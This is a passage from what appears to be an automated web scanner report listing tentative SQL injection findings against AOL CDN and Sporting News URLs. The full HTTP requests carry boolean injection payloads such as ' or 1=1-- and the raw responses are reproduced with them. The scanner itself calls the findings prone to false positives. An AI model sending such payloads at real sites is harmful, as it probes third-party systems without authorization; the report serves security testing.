<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #yearbooks * { margin:0; padding:0; line-height:1em; }
#yearbooks, #yearbooks a { display:block; width:180px; height:150px; overflow:hidden; }
#yearbooks .middle { width:100%; height:100%; background:url(http://st.snimg.com/image/promos/yearbooks/2011-pro-football-draft-guide-bg-180x150.png) no-repeat; }
#yearbooks .top { position:absolute; top:0; left:0; }
#yearbooks img.cover { margin:25px 0 0 12px; }
#yearbooks img.fade { margin:-50px 0 0 8px; }
#yearbooks a { position:absolute; top:0; left;:0; background:#fff; opacity:0; filter:alpha(opacity=0); }
</style>
<div id="yearbooks" class="ad-180x150">
<div class="middle">
<img src="http://st.snimg.com/image/yearbooks/pro-football-draft-guide/2011/2011Draft1-w100.jpg" class="cover" /><br />
<img src="http://st.snimg.com/image/promos/bg-fade-black.png" class="fade" />
<div class="top"><img src="http://st.snimg.com/image/promos/yearbooks/top-180x150.png" /></div>
</div>
<a href="https://www.streetandsmiths.com/index.cfm?fuseaction=store.covers&catid=7&year=2011" target="_blank" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | Pro Football Draft Guide Yearbook | 180x150');"></a>
</div>

Request 2

GET /services/sn-promos/yearbooks.php?113762307%20or%201%3d2--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:31:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1280

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #yearbooks * { margin:0; padding:0; line-height:1em; }
#yearbooks, #yearbooks a { display:block; width:180px; height:150px; overflow:hidden; }
#yearbooks .middle { width:100%; height:100%; background:url(http://st.snimg.com/image/promos/yearbooks/2011-baseball-bg-180x150.png) no-repeat; }
#yearbooks .top { position:absolute; top:0; left:0; }
#yearbooks img.cover { margin:25px 0 0 12px; }
#yearbooks img.fade { margin:-50px 0 0 8px; }
#yearbooks a { position:absolute; top:0; left;:0; background:#fff; opacity:0; filter:alpha(opacity=0); }
</style>
<div id="yearbooks" class="ad-180x150">
<div class="middle">
<img src="http://st.snimg.com/image/yearbooks/baseball/2011/2011BB5-w100.jpg" class="cover" /><br />
<img src="http://st.snimg.com/image/promos/bg-fade-black.png" class="fade" />
<div class="top"><img src="http://st.snimg.com/image/promos/yearbooks/top-180x150.png" /></div>
</div>
<a href="https://www.streetandsmiths.com/index.cfm?fuseaction=store.covers&catid=1&year=2011" target="_blank" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | Baseball Yearbook | 180x150');"></a>
</div>

1.6. http://o.aolcdn.com/os/fanhouse/design/v2/css/fanhouse.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/fanhouse/design/v2/css/fanhouse.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17216175'%20or%201%3d1--%20 and 17216175'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/fanhouse17216175'%20or%201%3d1--%20/design/v2/css/fanhouse.css?version=172 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:36:02 GMT
Date: Thu, 05 May 2011 01:09:44 GMT
Connection: close

GIF89ax.Z.....3f3.3f3f.f.........333fff.....333ff.......3.3f3f.f........f...33...3..fff3..f......f3..f3..f...3...33.fff33.ff...............fff333............................................................,....x.Z......pH,....r.l:...tJ.Z...v..z...xL.....
...V,..M....J}E.Aqs|h.B(&.D...Dwx+p+.c    '.(....%..%%).$.+#)#xq.p,.X.......&(...........x..q).S.&..)).).&........%$..,p., .Ip*..(.$.........(......%.a..h......b.N..d.T...p..[........P..e... ..,*.......yFx..    .F..p....C...%O".s..2.-.....d..(S...q..9.........F4.$.@.rr..y..A..O.A../.?..H..9.....&bhZ...q.
....RR?......-..(Ax%A....?...X........d.P.VMY.8....b
..TP...?.?..d6...*O%?Eq....4.R{.A..+a.4..bA....Vy......QKAK....)...J9x.FW._...p.$...
....
...J[K........gc...d..b.
....B...B.......-Y..k,,..J..'.p........O=....tj...k....X*H4#....T.........O0.Pw.[.1U.D.0y.s...RB..".y....CI=..k#|8.
.#.
.$w.\..$.R.    V%    >j).    .<e._*d.A....!    x...pQ..T1.^.Iw.u`..Bh..d...W...'.X0...v.....u..#..`..x..D)....Y...$....5gk......a.U$x......:.D...!$....[.n.E.p)$..    . [&$.a.a.d...Z.v..q)..\z>6.K/...[+...!...{...)f.u0E..[......f..t...c.3.:jJ-.{.vN5..l..@........&.as.}.G.H...R.M...@...6."..F...$.+...)........f$..y
..N.I    ..$....bwG..+...+.X+.....J..`{O..."...^~...Wu...t..b....G^a.~..jf..P    *.2..*q....tP.f.~........{...hnF.L: ...    Y/906.........a../..^.$.W...0...d..@.?.!.E.i.x<...R..B
.^7Y..e...~..k.....4!.h....(......hhl."F$.U.u. ...
..U..h.'....@#..Le...........8.X.ST.    .....+[..C..p..U.B..e.%AJX..) `..8E....nl...-@..0Z.b..@..9..B.e%........f.R..8.,......3.%..04...*...a .&...#.1.j....H$....hp.*
L.S.@..t    .!sF0.,..\.@.....i.#nz.......BKB,.Q..X...&tZ[..u.O2+,...(....Y.s........UF.T.b.V.....W>.$...2.    -D.t..2....-%R..\....X.p...J...q..@.h..&r.~..4*.......h.0fI.n4&.b.$..C.P^"..6sW.....Y.    .R9a#.
...[SNIP]...

Request 2

GET /os/fanhouse17216175'%20or%201%3d2--%20/design/v2/css/fanhouse.css?version=172 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1159
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:10:14 GMT
Date: Thu, 05 May 2011 01:09:44 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1159

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css</u></p><p><b>description</b> <u>The requested resource (Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.7. http://o.aolcdn.com/os/fonts/helvetica_lt_77_bold_condensed-webfont.woff [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 22210006'%20or%201%3d1--%20 and 22210006'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006'%20or%201%3d1--%20 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:47:14 GMT
Date: Thu, 05 May 2011 01:20:56 GMT
Connection: close

GIF89ax.Z.....3f3.3f3f.f.........333fff.....333ff.......3.3f3f.f........f...33...3..fff3..f......f3..f3..f...3...33.fff33.ff...............fff333............................................................,....x.Z......pH,....r.l:...tJ.Z...v..z...xL.....
...V,..M....J}E.Aqs|h.B(&.D...Dwx+p+.c    '.(....%..%%).$.+#)#xq.p,.X.......&(...........x..q).S.&..)).).&........%$..,p., .Ip*..(.$.........(......%.a..h......b.N..d.T...p..[........P..e... ..,*.......yFx..    .F..p....C...%O".s..2.-.....d..(S...q..9.........F4.$.@.rr..y..A..O.A../.?..H..9.....&bhZ...q.
....RR?......-..(Ax%A....?...X........d.P.VMY.8....b
..TP...?.?..d6...*O%?Eq....4.R{.A..+a.4..bA....Vy......QKAK....)...J9x.FW._...p.$...
....
...J[K........gc...d..b.
....B...B.......-Y..k,,..J..'.p........O=....tj...k....X*H4#....T.........O0.Pw.[.1U.D.0y.s...RB..".y....CI=..k#|8.
.#.
.$w.\..$.R.    V%    >j).    .<e._*d.A....!    x...pQ..T1.^.Iw.u`..Bh..d...W...'.X0...v.....u..#..`..x..D)....Y...$....5gk......a.U$x......:.D...!$....[.n.E.p)$..    . [&$.a.a.d...Z.v..q)..\z>6.K/...[+...!...{...)f.u0E..[......f..t...c.3.:jJ-.{.vN5..l..@........&.as.}.G.H...R.M...@...6."..F...$.+...)........f$..y
..N.I    ..$....bwG..+...+.X+.....J..`{O..."...^~...Wu...t..b....G^a.~..jf..P    *.2..*q....tP.f.~........{...hnF.L: ...    Y/906.........a../..^.$.W...0...d..@.?.!.E.i.x<...R..B
.^7Y..e...~..k.....4!.h....(......hhl."F$.U.u. ...
..U..h.'....@#..Le...........8.X.ST.    .....+[..C..p..U.B..e.%AJX..) `..8E....nl...-@..0Z.b..@..9..B.e%........f.R..8.,......3.%..04...*...a .&...#.1.j....H$....hp.*
L.S.@..t    .!sF0.,..\.@.....i.#nz.......BKB,.Q..X...&tZ[..u.O2+,...(....Y.s........UF.T.b.V.....W>.$...2.    -D.t..2....-%R..\....X.p...J...q..@.h..&r.~..4*.......h.0fI.n4&.b.$..C.P^"..6sW.....Y.    .R9a#.
...[SNIP]...

Request 2

GET /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006'%20or%201%3d2--%20 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1201
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:21:26 GMT
Date: Thu, 05 May 2011 01:20:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1201

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- </h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- </u></p><p><b>description</b> <u>The requested resource (Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- ) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.8. http://o.aolcdn.com/os/mobile-desktop/js/mobileblog.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/mobile-desktop/js/mobileblog.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14243832'%20or%201%3d1--%20 and 14243832'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/mobile-desktop14243832'%20or%201%3d1--%20/js/mobileblog.js HTTP/1.1
Host: o.aolcdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Mon, 05 May 2014 04:24:32 GMT
Date: Thu, 05 May 2011 10:58:14 GMT
Connection: close

GIF89ax.Z.....3f3.3f3f.f.........333fff.....333ff.......3.3f3f.f........f...33...3..fff3..f......f3..f3..f...3...33.fff33.ff...............fff333............................................................,....x.Z......pH,....r.l:...tJ.Z...v..z...xL.....
...V,..M....J}E.Aqs|h.B(&.D...Dwx+p+.c    '.(....%..%%).$.+#)#xq.p,.X.......&(...........x..q).S.&..)).).&........%$..,p., .Ip*..(.$.........(......%.a..h......b.N..d.T...p..[........P..e... ..,*.......yFx..    .F..p....C...%O".s..2.-.....d..(S...q..9.........F4.$.@.rr..y..A..O.A../.?..H..9.....&bhZ...q.
....RR?......-..(Ax%A....?...X........d.P.VMY.8....b
..TP...?.?..d6...*O%?Eq....4.R{.A..+a.4..bA....Vy......QKAK....)...J9x.FW._...p.$...
....
...J[K........gc...d..b.
....B...B.......-Y..k,,..J..'.p........O=....tj...k....X*H4#....T.........O0.Pw.[.1U.D.0y.s...RB..".y....CI=..k#|8.
.#.
.$w.\..$.R.    V%    >j).    .<e._*d.A....!    x...pQ..T1.^.Iw.u`..Bh..d...W...'.X0...v.....u..#..`..x..D)....Y...$....5gk......a.U$x......:.D...!$....[.n.E.p)$..    . [&$.a.a.d...Z.v..q)..\z>6.K/...[+...!...{...)f.u0E..[......f..t...c.3.:jJ-.{.vN5..l..@........&.as.}.G.H...R.M...@...6."..F...$.+...)........f$..y
..N.I    ..$....bwG..+...+.X+.....J..`{O..."...^~...Wu...t..b....G^a.~..jf..P    *.2..*q....tP.f.~........{...hnF.L: ...    Y/906.........a../..^.$.W...0...d..@.?.!.E.i.x<...R..B
.^7Y..e...~..k.....4!.h....(......hhl."F$.U.u. ...
..U..h.'....@#..Le...........8.X.ST.    .....+[..C..p..U.B..e.%AJX..) `..8E....nl...-@..0Z.b..@..9..B.e%........f.R..8.,......3.%..04...*...a .&...#.1.j....H$....hp.*
L.S.@..t    .!sF0.,..\.@.....i.#nz.......BKB,.Q..X...&tZ[..u.O2+,...(....Y.s........UF.T.b.V.....W>.$...2.    -D.t..2....-%R..\....X.p...J...q..@.h..&r.~..4*.......h.0fI.n4&.b.$..C.P^"..6sW.....Y.    .R9a#.
...[SNIP]...

Request 2

GET /os/mobile-desktop14243832'%20or%201%3d2--%20/js/mobileblog.js HTTP/1.1
Host: o.aolcdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1147
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 10:58:44 GMT
Date: Thu, 05 May 2011 10:58:14 GMT
Content-Length: 1147
Connection: close

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /mobile-desktop14243832' or 1=2-- /js/mobileblog.js</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /mobile-desktop14243832' or 1=2-- /js/mobileblog.js</u></p><p><b>description</b> <u>The requested resource (Unknown File: /mobile-desktop14243832' or 1=2-- /js/mobileblog.js) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.9. http://o.aolcdn.com/os/realestate/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/realestate/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 51809587'%20or%201%3d1--%20 and 51809587'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/realestate51809587'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:53:58 GMT
Date: Thu, 05 May 2011 01:27:40 GMT
Connection: close

GIF89ax.Z.....3f3.3f3f.f.........333fff.....333ff.......3.3f3f.f........f...33...3..fff3..f......f3..f3..f...3...33.fff33.ff...............fff333............................................................,....x.Z......pH,....r.l:...tJ.Z...v..z...xL.....
...V,..M....J}E.Aqs|h.B(&.D...Dwx+p+.c    '.(....%..%%).$.+#)#xq.p,.X.......&(...........x..q).S.&..)).).&........%$..,p., .Ip*..(.$.........(......%.a..h......b.N..d.T...p..[........P..e... ..,*.......yFx..    .F..p....C...%O".s..2.-.....d..(S...q..9.........F4.$.@.rr..y..A..O.A../.?..H..9.....&bhZ...q.
....RR?......-..(Ax%A....?...X........d.P.VMY.8....b
..TP...?.?..d6...*O%?Eq....4.R{.A..+a.4..bA....Vy......QKAK....)...J9x.FW._...p.$...
....
...J[K........gc...d..b.
....B...B.......-Y..k,,..J..'.p........O=....tj...k....X*H4#....T.........O0.Pw.[.1U.D.0y.s...RB..".y....CI=..k#|8.
.#.
.$w.\..$.R.    V%    >j).    .<e._*d.A....!    x...pQ..T1.^.Iw.u`..Bh..d...W...'.X0...v.....u..#..`..x..D)....Y...$....5gk......a.U$x......:.D...!$....[.n.E.p)$..    . [&$.a.a.d...Z.v..q)..\z>6.K/...[+...!...{...)f.u0E..[......f..t...c.3.:jJ-.{.vN5..l..@........&.as.}.G.H...R.M...@...6."..F...$.+...)........f$..y
..N.I    ..$....bwG..+...+.X+.....J..`{O..."...^~...Wu...t..b....G^a.~..jf..P    *.2..*q....tP.f.~........{...hnF.L: ...    Y/906.........a../..^.$.W...0...d..@.?.!.E.i.x<...R..B
.^7Y..e...~..k.....4!.h....(......hhl."F$.U.u. ...
..U..h.'....@#..Le...........8.X.ST.    .....+[..C..p..U.B..e.%AJX..) `..8E....nl...-@..0Z.b..@..9..B.e%........f.R..8.,......3.%..04...*...a .&...#.1.j....H$....hp.*
L.S.@..t    .!sF0.,..\.@.....i.#nz.......BKB,.Q..X...&tZ[..u.O2+,...(....Y.s........UF.T.b.V.....W>.$...2.    -D.t..2....-%R..\....X.p...J...q..@.h..&r.~..4*.......h.0fI.n4&.b.$..C.P^"..6sW.....Y.    .R9a#.
...[SNIP]...

Request 2

GET /os/realestate51809587'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Cteonnt-Length: 1120
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:28:10 GMT
Date: Thu, 05 May 2011 01:27:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1120

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /realestate51809587' or 1=2-- /favicon.ico</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /realestate51809587' or 1=2-- /favicon.ico</u></p><p><b>description</b> <u>The requested resource (Unknown File: /realestate51809587' or 1=2-- /favicon.ico) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.10. http://o.aolcdn.com/os_merge/ [file parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os_merge/

Issue detail

The file parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the file parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os_merge/?file=/aol/jquery-1.4.3.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare.debug.min.js&file=/aol/jquery.multiauth-1.0.min.js'%20and%201%3d1--%20&file=/aol/jquery.globalheader-1.5.min.js&file=/aol/jquery.globalsearchbox-1.5.min.js&file=/aol/aol.relatedvideo.min.js&file=/music/js/delegate.js&file=/music/js/jquery.twitter.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.aolmostpopular.min.js&file=/music/js/feedback.js&file=/music/js/artist-legacy-hubs.js&v=5 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 14:47:44 GMT
Content-Type: application/javascript
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 02:18:22 GMT
Date: Thu, 05 May 2011 01:18:22 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 122281

/*!
* jQuery JavaScript Library v1.4.3
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
;U.devId=(f.aolGetAuthToken.devId||devId);o(U)}})})}});n.replaceWith(G)}};f.fn.aolShare=function(l){return this.each(function(){l=l||{};l.elem=this;f.aolShare(l)})}})(jQuery,window,document);(function(g,i,m){var n=i.location,f=g(m),j=encodeURIComponent,l=0,d,e={namespace:"aol-multiauth",devId:"ao1ARQUlqDsixdht",successUrl:n.protocol+"//"+n.hostname+"/_uac/authReceiver.html",tabs:["aol","aim","facebook","google","yahoo","twitter"],branded:0,reload:0,lang:"en",locale:"us",snsAuthenticated:0,snsServer:"http://my.screenname.aol.com",authServer:"http://api.screenname.aol.com"},a={namespace:"aol-getToken",devId:"ao1ARQUlqDsixdht",authServer:"http://api.screenname.aol.com",callback:function(){}},c,h=[],b=0,o=navigator.userAgent.toLowerCase(),k=o.indexOf("safari")!==-1&&o.indexOf("chrome")===-1;g.multiAuth=function(q){if(q.authLink){var p=g.extend({},e,q),v=p.namespace,B=p.authServer,E=p.snsServer,z=p.devId,r=p.successUrl,F=p.authLink,G=p.branded,H=p.lang,A=p.locale,y=p.selectedTab,x=p.snsSiteDomain,D=p.snsPopupSiteState||j("OrigUrl="+j(r)),C=p.snsIframeSiteState||j("OrigUrl="+j(n)),t=p.snsAuthenticated;g.multiAuth.devId=z;function w(R,S){function T(U){b=0;U.preventDefault();var 